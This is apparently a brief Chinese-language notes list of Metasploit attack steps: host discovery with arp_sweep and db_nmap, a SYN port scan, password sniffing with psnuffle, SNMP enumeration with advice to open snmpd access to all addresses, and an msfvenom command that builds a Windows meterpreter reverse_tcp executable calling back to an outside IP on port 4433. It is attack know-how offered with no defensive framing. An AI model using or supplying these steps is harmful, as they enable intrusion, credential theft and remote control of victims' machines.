1.基于tcp的主机信息收集
(1)use arp_sweep
(2)db_nmap
(3)Tcp协议半连接扫描syn
use portscan/syn
(4)密码嗅探
Sniffer/psnuffle
2.基于snmp协议的信息收集
(1) snmp_enum 需/etc/default/snmpd中开启全部ip访问 0.0.0.0/0
3.生成反弹shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe